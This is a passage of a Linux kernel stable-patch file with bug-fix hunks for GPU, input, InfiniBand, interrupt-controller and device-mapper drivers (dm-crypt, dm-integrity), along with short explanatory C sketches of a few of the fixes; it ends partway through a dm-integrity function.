++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c
+@@ -154,11 +154,17 @@ shadow_fw_init(struct nvkm_bios *bios, const char *name)
+ 	return (void *)fw;
+ }
+ 
++static void
++shadow_fw_release(void *fw)
++{
++	release_firmware(fw);
++}
++
+ static const struct nvbios_source
+ shadow_fw = {
+ 	.name = "firmware",
+ 	.init = shadow_fw_init,
+-	.fini = (void(*)(void *))release_firmware,
++	.fini = shadow_fw_release,
+ 	.read = shadow_fw_read,
+ 	.rw = false,
+ };
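
The nouveau hunk replaces a cast of release_firmware() to an incompatible function-pointer type with a thin wrapper of the exact expected signature; calling through a mismatched pointer type is undefined behavior in C and trips kernel CFI at runtime. A self-contained illustration, with stand-in types:

#include <stdio.h>

struct firmware { const char *name; };

static void release_firmware(const struct firmware *fw)
{
	printf("releasing %s\n", fw ? fw->name : "(null)");
}

struct source_ops {
	void (*fini)(void *data);	/* callback slot expects void * */
};

/* WRONG: .fini = (void (*)(void *))release_firmware
 * A call through that mismatched pointer type is undefined behavior.
 * RIGHT: a thin wrapper whose signature matches the slot exactly. */
static void shadow_fw_release(void *data)
{
	release_firmware(data);
}

static const struct source_ops shadow_fw_ops = {
	.fini = shadow_fw_release,
};

int main(void)
{
	struct firmware fw = { .name = "vbios" };

	shadow_fw_ops.fini(&fw);
	return 0;
}
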
+diff --git a/drivers/gpu/drm/ttm/ttm_pool.c b/drivers/gpu/drm/ttm/ttm_pool.c
+index 86affe987a1cb..393b97b4a991f 100644
+--- a/drivers/gpu/drm/ttm/ttm_pool.c
++++ b/drivers/gpu/drm/ttm/ttm_pool.c
+@@ -383,7 +383,7 @@ static void ttm_pool_free_range(struct ttm_pool *pool, struct ttm_tt *tt,
+ 				enum ttm_caching caching,
+ 				pgoff_t start_page, pgoff_t end_page)
+ {
+-	struct page **pages = tt->pages;
++	struct page **pages = &tt->pages[start_page];
+ 	unsigned int order;
+ 	pgoff_t i, nr;
+ 
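
The ttm_pool fix points the working pointer at &tt->pages[start_page] instead of the start of the whole array, so a partial free releases the requested slice rather than the first pages. The same idea in a standalone sketch (free_range() is hypothetical):

#include <stdio.h>
#include <stdlib.h>

static void free_range(void **pages, size_t start, size_t end)
{
	/* base must point at the first entry of the range, not the array */
	void **p = &pages[start];
	size_t i;

	for (i = 0; i < end - start; i++) {
		free(p[i]);
		p[i] = NULL;
	}
}

int main(void)
{
	void *pages[8];
	size_t i;

	for (i = 0; i < 8; i++)
		pages[i] = malloc(16);

	free_range(pages, 2, 5);	/* frees exactly pages[2..4] */

	for (i = 0; i < 8; i++)
		if (pages[i])
			free(pages[i]);
	return 0;
}
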
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index 59344ad62822d..c0aa6bfa66b24 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -40,7 +40,7 @@ MODULE_PARM_DESC(tjmax, "TjMax value in degrees Celsius");
+ 
+ #define PKG_SYSFS_ATTR_NO	1	/* Sysfs attribute for package temp */
+ #define BASE_SYSFS_ATTR_NO	2	/* Sysfs Base attr no for coretemp */
+-#define NUM_REAL_CORES		128	/* Number of Real cores per cpu */
++#define NUM_REAL_CORES		512	/* Number of Real cores per cpu */
+ #define CORETEMP_NAME_LENGTH	28	/* String Length of attrs */
+ #define MAX_CORE_ATTRS		4	/* Maximum no of basic attrs */
+ #define TOTAL_ATTRS		(MAX_CORE_ATTRS + 1)
+diff --git a/drivers/i2c/busses/i2c-imx.c b/drivers/i2c/busses/i2c-imx.c
+index fc70920c4ddab..0c203c614197c 100644
+--- a/drivers/i2c/busses/i2c-imx.c
++++ b/drivers/i2c/busses/i2c-imx.c
+@@ -804,6 +804,11 @@ static irqreturn_t i2c_imx_slave_handle(struct imx_i2c_struct *i2c_imx,
+ 		ctl &= ~I2CR_MTX;
+ 		imx_i2c_write_reg(ctl, i2c_imx, IMX_I2C_I2CR);
+ 		imx_i2c_read_reg(i2c_imx, IMX_I2C_I2DR);
++
++		/* flag the last byte as processed */
++		i2c_imx_slave_event(i2c_imx,
++				    I2C_SLAVE_READ_PROCESSED, &value);
++
+ 		i2c_imx_slave_finish_op(i2c_imx);
+ 		return IRQ_HANDLED;
+ 	}
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 4ed8814efde6f..6ed0568747eaa 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+@@ -1710,7 +1710,7 @@ int bnxt_re_modify_srq(struct ib_srq *ib_srq, struct ib_srq_attr *srq_attr,
+ 	switch (srq_attr_mask) {
+ 	case IB_SRQ_MAX_WR:
+ 		/* SRQ resize is not supported */
+-		break;
++		return -EINVAL;
+ 	case IB_SRQ_LIMIT:
+ 		/* Change the SRQ threshold */
+ 		if (srq_attr->srq_limit > srq->qplib_srq.max_wqe)
+@@ -1725,13 +1725,12 @@ int bnxt_re_modify_srq(struct ib_srq *ib_srq, struct ib_srq_attr *srq_attr,
+ 		/* On success, update the shadow */
+ 		srq->srq_limit = srq_attr->srq_limit;
+ 		/* No need to Build and send response back to udata */
+-		break;
++		return 0;
+ 	default:
+ 		ibdev_err(&rdev->ibdev,
+ 			  "Unsupported srq_attr_mask 0x%x", srq_attr_mask);
+ 		return -EINVAL;
+ 	}
+-	return 0;
+ }
+ 
+ int bnxt_re_query_srq(struct ib_srq *ib_srq, struct ib_srq_attr *srq_attr)
+diff --git a/drivers/infiniband/hw/hfi1/pio.c b/drivers/infiniband/hw/hfi1/pio.c
+index 51ae58c02b15c..802b0e5801a7d 100644
+--- a/drivers/infiniband/hw/hfi1/pio.c
++++ b/drivers/infiniband/hw/hfi1/pio.c
+@@ -2089,7 +2089,7 @@ int init_credit_return(struct hfi1_devdata *dd)
+ 				   "Unable to allocate credit return DMA range for NUMA %d\n",
+ 				   i);
+ 			ret = -ENOMEM;
+-			goto done;
++			goto free_cr_base;
+ 		}
+ 	}
+ 	set_dev_node(&dd->pcidev->dev, dd->node);
+@@ -2097,6 +2097,10 @@ int init_credit_return(struct hfi1_devdata *dd)
+ 	ret = 0;
+ done:
+ 	return ret;
++
++free_cr_base:
++	free_credit_return(dd);
++	goto done;
+ }
+ 
+ void free_credit_return(struct hfi1_devdata *dd)
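
The hfi1 fix turns a bare goto done on allocation failure into a goto free_cr_base that releases the ranges allocated so far, with the unwind label placed after the common return, mirroring the patch's layout. A compact sketch of that unwind shape, with invented names:

#include <stdlib.h>

struct devdata { void *cr_base[4]; };

static int init_credit_return(struct devdata *dd)
{
	int i, ret = 0;

	for (i = 0; i < 4; i++) {
		dd->cr_base[i] = malloc(64);
		if (!dd->cr_base[i]) {
			ret = -1;
			goto free_cr_base;	/* not "goto done": unwind first */
		}
	}
done:
	return ret;

free_cr_base:
	while (i--) {			/* free only what was allocated */
		free(dd->cr_base[i]);
		dd->cr_base[i] = NULL;
	}
	goto done;
}

int main(void)
{
	struct devdata dd = { { 0 } };

	return init_credit_return(&dd) ? 1 : 0;
}
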
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index 26c62162759ba..969c5c3ab859e 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -3158,7 +3158,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ {
+ 	int rval = 0;
+ 
+-	if ((unlikely(tx->num_desc + 1 == tx->desc_limit))) {
++	if ((unlikely(tx->num_desc == tx->desc_limit))) {
+ 		rval = _extend_sdma_tx_descs(dd, tx);
+ 		if (rval) {
+ 			__sdma_txclean(dd, tx);
+diff --git a/drivers/infiniband/hw/irdma/defs.h b/drivers/infiniband/hw/irdma/defs.h
+index ad54260cb58c9..ebe98fa2b1cd2 100644
+--- a/drivers/infiniband/hw/irdma/defs.h
++++ b/drivers/infiniband/hw/irdma/defs.h
+@@ -345,6 +345,7 @@ enum irdma_cqp_op_type {
+ #define IRDMA_AE_LLP_TOO_MANY_KEEPALIVE_RETRIES				0x050b
+ #define IRDMA_AE_LLP_DOUBT_REACHABILITY					0x050c
+ #define IRDMA_AE_LLP_CONNECTION_ESTABLISHED				0x050e
++#define IRDMA_AE_LLP_TOO_MANY_RNRS					0x050f
+ #define IRDMA_AE_RESOURCE_EXHAUSTION					0x0520
+ #define IRDMA_AE_RESET_SENT						0x0601
+ #define IRDMA_AE_TERMINATE_SENT						0x0602
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 311a1138e838d..918a2d783141f 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -379,6 +379,7 @@ static void irdma_process_aeq(struct irdma_pci_f *rf)
+ 		case IRDMA_AE_LLP_TOO_MANY_RETRIES:
+ 		case IRDMA_AE_LCE_QP_CATASTROPHIC:
+ 		case IRDMA_AE_LCE_FUNCTION_CATASTROPHIC:
++		case IRDMA_AE_LLP_TOO_MANY_RNRS:
+ 		case IRDMA_AE_LCE_CQ_CATASTROPHIC:
+ 		case IRDMA_AE_UDA_XMIT_DGRAM_TOO_LONG:
+ 		default:
+@@ -562,6 +563,13 @@ static void irdma_destroy_irq(struct irdma_pci_f *rf,
+ 	dev->irq_ops->irdma_dis_irq(dev, msix_vec->idx);
+ 	irq_update_affinity_hint(msix_vec->irq, NULL);
+ 	free_irq(msix_vec->irq, dev_id);
++	if (rf == dev_id) {
++		tasklet_kill(&rf->dpc_tasklet);
++	} else {
++		struct irdma_ceq *iwceq = (struct irdma_ceq *)dev_id;
++
++		tasklet_kill(&iwceq->dpc_tasklet);
++	}
+ }
+ 
+ /**
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 01faec6ea5285..42c671f209233 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -762,7 +762,9 @@ static int irdma_validate_qp_attrs(struct ib_qp_init_attr *init_attr,
+ 
+ 	if (init_attr->cap.max_inline_data > uk_attrs->max_hw_inline ||
+ 	    init_attr->cap.max_send_sge > uk_attrs->max_hw_wq_frags ||
+-	    init_attr->cap.max_recv_sge > uk_attrs->max_hw_wq_frags)
++	    init_attr->cap.max_recv_sge > uk_attrs->max_hw_wq_frags ||
++	    init_attr->cap.max_send_wr > uk_attrs->max_hw_wq_quanta ||
++	    init_attr->cap.max_recv_wr > uk_attrs->max_hw_rq_quanta)
+ 		return -EINVAL;
+ 
+ 	if (rdma_protocol_roce(&iwdev->ibdev, 1)) {
+@@ -2119,9 +2121,8 @@ static int irdma_create_cq(struct ib_cq *ibcq,
+ 		info.cq_base_pa = iwcq->kmem.pa;
+ 	}
+ 
+-	if (dev->hw_attrs.uk_attrs.hw_rev >= IRDMA_GEN_2)
+-		info.shadow_read_threshold = min(info.cq_uk_init_info.cq_size / 2,
+-						 (u32)IRDMA_MAX_CQ_READ_THRESH);
++	info.shadow_read_threshold = min(info.cq_uk_init_info.cq_size / 2,
++					 (u32)IRDMA_MAX_CQ_READ_THRESH);
+ 
+ 	if (irdma_sc_cq_init(cq, &info)) {
+ 		ibdev_dbg(&iwdev->ibdev, "VERBS: init cq fail\n");
+diff --git a/drivers/infiniband/hw/qedr/verbs.c b/drivers/infiniband/hw/qedr/verbs.c
+index d745ce9dc88aa..61755b5f3e20d 100644
+--- a/drivers/infiniband/hw/qedr/verbs.c
++++ b/drivers/infiniband/hw/qedr/verbs.c
+@@ -1879,8 +1879,17 @@ static int qedr_create_user_qp(struct qedr_dev *dev,
+ 		/* RQ - read access only (0) */
+ 		rc = qedr_init_user_queue(udata, dev, &qp->urq, ureq.rq_addr,
+ 					  ureq.rq_len, true, 0, alloc_and_init);
+-		if (rc)
++		if (rc) {
++			ib_umem_release(qp->usq.umem);
++			qp->usq.umem = NULL;
++			if (rdma_protocol_roce(&dev->ibdev, 1)) {
++				qedr_free_pbl(dev, &qp->usq.pbl_info,
++					      qp->usq.pbl_tbl);
++			} else {
++				kfree(qp->usq.pbl_tbl);
++			}
+ 			return rc;
++		}
+ 	}
+ 
+ 	memset(&in_params, 0, sizeof(in_params));
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index 25e799dba999e..cffa93f114a73 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -79,12 +79,16 @@ module_param(srpt_srq_size, int, 0444);
+ MODULE_PARM_DESC(srpt_srq_size,
+ 		 "Shared receive queue (SRQ) size.");
+ 
++static int srpt_set_u64_x(const char *buffer, const struct kernel_param *kp)
++{
++	return kstrtou64(buffer, 16, (u64 *)kp->arg);
++}
+ static int srpt_get_u64_x(char *buffer, const struct kernel_param *kp)
+ {
+ 	return sprintf(buffer, "0x%016llx\n", *(u64 *)kp->arg);
+ }
+-module_param_call(srpt_service_guid, NULL, srpt_get_u64_x, &srpt_service_guid,
+-		  0444);
++module_param_call(srpt_service_guid, srpt_set_u64_x, srpt_get_u64_x,
++		  &srpt_service_guid, 0444);
+ MODULE_PARM_DESC(srpt_service_guid,
+ 		 "Using this value for ioc_guid, id_ext, and cm_listen_id instead of using the node_guid of the first HCA.");
+ 
+@@ -210,10 +214,12 @@ static const char *get_ch_state_name(enum rdma_ch_state s)
+ /**
+  * srpt_qp_event - QP event callback function
+  * @event: Description of the event that occurred.
+- * @ch: SRPT RDMA channel.
++ * @ptr: SRPT RDMA channel.
+  */
+-static void srpt_qp_event(struct ib_event *event, struct srpt_rdma_ch *ch)
++static void srpt_qp_event(struct ib_event *event, void *ptr)
+ {
++	struct srpt_rdma_ch *ch = ptr;
++
+ 	pr_debug("QP event %d on ch=%p sess_name=%s-%d state=%s\n",
+ 		 event->event, ch, ch->sess_name, ch->qp->qp_num,
+ 		 get_ch_state_name(ch->state));
+@@ -1807,8 +1813,7 @@ static int srpt_create_ch_ib(struct srpt_rdma_ch *ch)
+ 	ch->cq_size = ch->rq_size + sq_size;
+ 
+ 	qp_init->qp_context = (void *)ch;
+-	qp_init->event_handler
+-		= (void(*)(struct ib_event *, void*))srpt_qp_event;
++	qp_init->event_handler = srpt_qp_event;
+ 	qp_init->send_cq = ch->cq;
+ 	qp_init->recv_cq = ch->cq;
+ 	qp_init->sq_sig_type = IB_SIGNAL_REQ_WR;
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index e8011d70d0799..02f3bc4e4895e 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -294,6 +294,7 @@ static const struct xpad_device {
+ 	{ 0x1689, 0xfd00, "Razer Onza Tournament Edition", 0, XTYPE_XBOX360 },
+ 	{ 0x1689, 0xfd01, "Razer Onza Classic Edition", 0, XTYPE_XBOX360 },
+ 	{ 0x1689, 0xfe00, "Razer Sabertooth", 0, XTYPE_XBOX360 },
++	{ 0x17ef, 0x6182, "Lenovo Legion Controller for Windows", 0, XTYPE_XBOX360 },
+ 	{ 0x1949, 0x041a, "Amazon Game Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x1bad, 0x0002, "Harmonix Rock Band Guitar", 0, XTYPE_XBOX360 },
+ 	{ 0x1bad, 0x0003, "Harmonix Rock Band Drumkit", MAP_DPAD_TO_BUTTONS, XTYPE_XBOX360 },
+@@ -489,6 +490,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOX360_VENDOR(0x15e4),		/* Numark X-Box 360 controllers */
+ 	XPAD_XBOX360_VENDOR(0x162e),		/* Joytech X-Box 360 controllers */
+ 	XPAD_XBOX360_VENDOR(0x1689),		/* Razer Onza */
++	XPAD_XBOX360_VENDOR(0x17ef),		/* Lenovo */
+ 	XPAD_XBOX360_VENDOR(0x1949),		/* Amazon controllers */
+ 	XPAD_XBOX360_VENDOR(0x1bad),		/* Harminix Rock Band Guitar and Drums */
+ 	XPAD_XBOX360_VENDOR(0x20d6),		/* PowerA Controllers */
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index cd45a65e17f2c..dfc6c581873b7 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -634,6 +634,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
+ 	},
++	{
++		/* Fujitsu Lifebook U728 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK U728"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index 3f0732db7bf5b..6de64b3f900fb 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -884,7 +884,8 @@ static int goodix_add_acpi_gpio_mappings(struct goodix_ts_data *ts)
+ 		}
+ 	}
+ 
+-	if (ts->gpio_count == 2 && ts->gpio_int_idx == 0) {
++	/* Some devices with gpio_int_idx 0 list a third unused GPIO */
++	if ((ts->gpio_count == 2 || ts->gpio_count == 3) && ts->gpio_int_idx == 0) {
+ 		ts->irq_pin_access_method = IRQ_PIN_ACCESS_ACPI_GPIO;
+ 		gpio_mapping = acpi_goodix_int_first_gpios;
+ 	} else if (ts->gpio_count == 2 && ts->gpio_int_idx == 1) {
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index b83b39e93e1a9..4d03fb3a82460 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -3161,6 +3161,7 @@ static void its_cpu_init_lpis(void)
+ 	val |= GICR_CTLR_ENABLE_LPIS;
+ 	writel_relaxed(val, rbase + GICR_CTLR);
+ 
++out:
+ 	if (gic_rdists->has_vlpis && !gic_rdists->has_rvpeid) {
+ 		void __iomem *vlpi_base = gic_data_rdist_vlpi_base();
+ 
+@@ -3196,7 +3197,6 @@ static void its_cpu_init_lpis(void)
+ 
+ 	/* Make sure the GIC has seen the above */
+ 	dsb(sy);
+-out:
+ 	gic_data_rdist()->flags |= RD_LOCAL_LPI_ENABLED;
+ 	pr_info("GICv3: CPU%d: using %s LPI pending table @%pa\n",
+ 		smp_processor_id(),
+diff --git a/drivers/irqchip/irq-sifive-plic.c b/drivers/irqchip/irq-sifive-plic.c
+index 2f4784860df5d..be5e19a86ac3b 100644
+--- a/drivers/irqchip/irq-sifive-plic.c
++++ b/drivers/irqchip/irq-sifive-plic.c
+@@ -144,7 +144,13 @@ static void plic_irq_eoi(struct irq_data *d)
+ {
+ 	struct plic_handler *handler = this_cpu_ptr(&plic_handlers);
+ 
+-	writel(d->hwirq, handler->hart_base + CONTEXT_CLAIM);
++	if (unlikely(irqd_irq_disabled(d))) {
++		plic_toggle(handler, d->hwirq, 1);
++		writel(d->hwirq, handler->hart_base + CONTEXT_CLAIM);
++		plic_toggle(handler, d->hwirq, 0);
++	} else {
++		writel(d->hwirq, handler->hart_base + CONTEXT_CLAIM);
++	}
+ }
+ 
+ #ifdef CONFIG_SMP
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 0e6068ee783e7..3e215aa85b99a 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -61,6 +61,8 @@ struct convert_context {
+ 		struct skcipher_request *req;
+ 		struct aead_request *req_aead;
+ 	} r;
++	bool aead_recheck;
++	bool aead_failed;
+ 
+ };
+ 
+@@ -81,6 +83,8 @@ struct dm_crypt_io {
+ 	blk_status_t error;
+ 	sector_t sector;
+ 
++	struct bvec_iter saved_bi_iter;
++
+ 	struct rb_node rb_node;
+ } CRYPTO_MINALIGN_ATTR;
+ 
+@@ -1365,10 +1369,13 @@ static int crypt_convert_block_aead(struct crypt_config *cc,
+ 	if (r == -EBADMSG) {
+ 		sector_t s = le64_to_cpu(*sector);
+ 
+-		DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
+-			    ctx->bio_in->bi_bdev, s);
+-		dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
+-				 ctx->bio_in, s, 0);
++		ctx->aead_failed = true;
++		if (ctx->aead_recheck) {
++			DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
++				    ctx->bio_in->bi_bdev, s);
++			dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
++					 ctx->bio_in, s, 0);
++		}
+ 	}
+ 
+ 	if (!r && cc->iv_gen_ops && cc->iv_gen_ops->post)
+@@ -1724,6 +1731,8 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->base_bio = bio;
+ 	io->sector = sector;
+ 	io->error = 0;
++	io->ctx.aead_recheck = false;
++	io->ctx.aead_failed = false;
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
+@@ -1735,6 +1744,8 @@ static void crypt_inc_pending(struct dm_crypt_io *io)
+ 	atomic_inc(&io->io_pending);
+ }
+ 
++static void kcryptd_queue_read(struct dm_crypt_io *io);
++
+ /*
+  * One of the bios was finished. Check for completion of
+  * the whole request and correctly clean up the buffer.
+@@ -1748,6 +1759,15 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 	if (!atomic_dec_and_test(&io->io_pending))
+ 		return;
+ 
++	if (likely(!io->ctx.aead_recheck) && unlikely(io->ctx.aead_failed) &&
++	    cc->on_disk_tag_size && bio_data_dir(base_bio) == READ) {
++		io->ctx.aead_recheck = true;
++		io->ctx.aead_failed = false;
++		io->error = 0;
++		kcryptd_queue_read(io);
++		return;
++	}
++
+ 	if (io->ctx.r.req)
+ 		crypt_free_req(cc, io->ctx.r.req, base_bio);
+ 
+@@ -1783,15 +1803,19 @@ static void crypt_endio(struct bio *clone)
+ 	struct dm_crypt_io *io = clone->bi_private;
+ 	struct crypt_config *cc = io->cc;
+ 	unsigned int rw = bio_data_dir(clone);
+-	blk_status_t error;
++	blk_status_t error = clone->bi_status;
++
++	if (io->ctx.aead_recheck && !error) {
++		kcryptd_queue_crypt(io);
++		return;
++	}
+ 
+ 	/*
+ 	 * free the processed pages
+ 	 */
+-	if (rw == WRITE)
++	if (rw == WRITE || io->ctx.aead_recheck)
+ 		crypt_free_buffer_pages(cc, clone);
+ 
+-	error = clone->bi_status;
+ 	bio_put(clone);
+ 
+ 	if (rw == READ && !error) {
+@@ -1812,6 +1836,22 @@ static int kcryptd_io_read(struct dm_crypt_io *io, gfp_t gfp)
+ 	struct crypt_config *cc = io->cc;
+ 	struct bio *clone;
+ 
++	if (io->ctx.aead_recheck) {
++		if (!(gfp & __GFP_DIRECT_RECLAIM))
++			return 1;
++		crypt_inc_pending(io);
++		clone = crypt_alloc_buffer(io, io->base_bio->bi_iter.bi_size);
++		if (unlikely(!clone)) {
++			crypt_dec_pending(io);
++			return 1;
++		}
++		clone->bi_iter.bi_sector = cc->start + io->sector;
++		crypt_convert_init(cc, &io->ctx, clone, clone, io->sector);
++		io->saved_bi_iter = clone->bi_iter;
++		dm_submit_bio_remap(io->base_bio, clone);
++		return 0;
++	}
++
+ 	/*
+ 	 * We need the original biovec array in order to decrypt the whole bio
+ 	 * data *afterwards* -- thanks to immutable biovecs we don't need to
+@@ -2038,6 +2078,12 @@ static void kcryptd_crypt_write_convert(struct dm_crypt_io *io)
+ 	io->ctx.bio_out = clone;
+ 	io->ctx.iter_out = clone->bi_iter;
+ 
++	if (crypt_integrity_aead(cc)) {
++		bio_copy_data(clone, io->base_bio);
++		io->ctx.bio_in = clone;
++		io->ctx.iter_in = clone->bi_iter;
++	}
++
+ 	sector += bio_sectors(clone);
+ 
+ 	crypt_inc_pending(io);
+@@ -2074,6 +2120,14 @@ static void kcryptd_crypt_write_convert(struct dm_crypt_io *io)
+ 
+ static void kcryptd_crypt_read_done(struct dm_crypt_io *io)
+ {
++	if (io->ctx.aead_recheck) {
++		if (!io->error) {
++			io->ctx.bio_in->bi_iter = io->saved_bi_iter;
++			bio_copy_data(io->base_bio, io->ctx.bio_in);
++		}
++		crypt_free_buffer_pages(io->cc, io->ctx.bio_in);
++		bio_put(io->ctx.bio_in);
++	}
+ 	crypt_dec_pending(io);
+ }
+ 
+@@ -2103,11 +2157,17 @@ static void kcryptd_crypt_read_convert(struct dm_crypt_io *io)
+ 
+ 	crypt_inc_pending(io);
+ 
+-	crypt_convert_init(cc, &io->ctx, io->base_bio, io->base_bio,
+-			   io->sector);
++	if (io->ctx.aead_recheck) {
++		io->ctx.cc_sector = io->sector + cc->iv_offset;
++		r = crypt_convert(cc, &io->ctx,
++				  test_bit(DM_CRYPT_NO_READ_WORKQUEUE, &cc->flags), true);
++	} else {
++		crypt_convert_init(cc, &io->ctx, io->base_bio, io->base_bio,
++				   io->sector);
+ 
+-	r = crypt_convert(cc, &io->ctx,
+-			  test_bit(DM_CRYPT_NO_READ_WORKQUEUE, &cc->flags), true);
++		r = crypt_convert(cc, &io->ctx,
++				  test_bit(DM_CRYPT_NO_READ_WORKQUEUE, &cc->flags), true);
++	}
+ 	/*
+ 	 * Crypto API backlogged the request, because its queue was full
+ 	 * and we're in softirq context, so continue from a workqueue
+@@ -2150,10 +2210,13 @@ static void kcryptd_async_done(struct crypto_async_request *async_req,
+ 	if (error == -EBADMSG) {
+ 		sector_t s = le64_to_cpu(*org_sector_of_dmreq(cc, dmreq));
+ 
+-		DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
+-			    ctx->bio_in->bi_bdev, s);
+-		dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
+-				 ctx->bio_in, s, 0);
++		ctx->aead_failed = true;
++		if (ctx->aead_recheck) {
++			DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
++				    ctx->bio_in->bi_bdev, s);
++			dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
++					 ctx->bio_in, s, 0);
++		}
+ 		io->error = BLK_STS_PROTECTION;
+ 	} else if (error < 0)
+ 		io->error = BLK_STS_IOERR;
+@@ -3079,7 +3142,7 @@ static int crypt_ctr_optional(struct dm_target *ti, unsigned int argc, char **ar
+ 			sval = strchr(opt_string + strlen("integrity:"), ':') + 1;
+ 			if (!strcasecmp(sval, "aead")) {
+ 				set_bit(CRYPT_MODE_INTEGRITY_AEAD, &cc->cipher_flags);
+-			} else  if (strcasecmp(sval, "none")) {
++			} else if (strcasecmp(sval, "none")) {
+ 				ti->error = "Unknown integrity profile";
+ 				return -EINVAL;
+ 			}
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 77fcff82c82ac..3da4359f51645 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -279,6 +279,8 @@ struct dm_integrity_c {
+ 
+ 	atomic64_t number_of_mismatches;
+ 
++	mempool_t recheck_pool;
++
+ 	struct notifier_block reboot_notifier;
+ };
+ 
+@@ -1699,6 +1701,77 @@ static void integrity_sector_checksum(struct dm_integrity_c *ic, sector_t sector
+ 	get_random_bytes(result, ic->tag_size);
+ }
+ 
++static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checksum)
++{
++	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
++	struct dm_integrity_c *ic = dio->ic;
++	struct bvec_iter iter;
++	struct bio_vec bv;
++	sector_t sector, logical_sector, area, offset;
++	struct page *page;
++	void *buffer;
++
++	get_area_and_offset(ic, dio->range.logical_sector, &area, &offset);
++	dio->metadata_block = get_metadata_sector_and_offset(ic, area, offset,
++							     &dio->metadata_offset);
++	sector = get_data_sector(ic, area, offset);
++	logical_sector = dio->range.logical_sector;
++
++	page = mempool_alloc(&ic->recheck_pool, GFP_NOIO);
++	buffer = page_to_virt(page);
++
++	__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
++		unsigned pos = 0;
++
++		do {
++			char *mem;
++			int r;
++			struct dm_io_request io_req;
++			struct dm_io_region io_loc;
++			io_req.bi_opf = REQ_OP_READ;
++			io_req.mem.type = DM_IO_KMEM;
++			io_req.mem.ptr.addr = buffer;
++			io_req.notify.fn = NULL;
++			io_req.client = ic->io;
++			io_loc.bdev = ic->dev->bdev;
++			io_loc.sector = sector;
++			io_loc.count = ic->sectors_per_block;
++
++			r = dm_io(&io_req, 1, &io_loc, NULL);
++			if (unlikely(r)) {
++				dio->bi_status = errno_to_blk_status(r);
++				goto free_ret;
++			}
++
++			integrity_sector_checksum(ic, logical_sector, buffer, checksum);
++			r = dm_integrity_rw_tag(ic, checksum, &dio->metadata_block,
++						&dio->metadata_offset, ic->tag_size, TAG_CMP);
++			if (r) {
++				if (r > 0) {
++					DMERR_LIMIT("%pg: Checksum failed at sector 0x%llx",
++						    bio->bi_bdev, logical_sector);
++					atomic64_inc(&ic->number_of_mismatches);
++					dm_audit_log_bio(DM_MSG_PREFIX, "integrity-checksum",
++							 bio, logical_sector, 0);
++					r = -EILSEQ;
++				}
++				dio->bi_status = errno_to_blk_status(r);
++				goto free_ret;
++			}
++
++			mem = bvec_kmap_local(&bv);
